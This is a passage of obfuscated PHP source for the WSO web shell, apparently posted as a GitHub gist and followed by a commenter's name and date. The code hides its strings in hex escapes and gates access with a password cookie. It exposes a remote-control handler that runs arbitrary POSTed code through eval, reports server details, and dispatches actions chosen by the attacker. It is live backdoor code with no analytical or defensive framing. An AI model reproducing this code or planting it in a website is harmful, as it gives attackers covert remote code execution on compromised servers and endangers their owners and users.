WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit;
?>
@kenorb

kenorb commented Apr 15, 2015
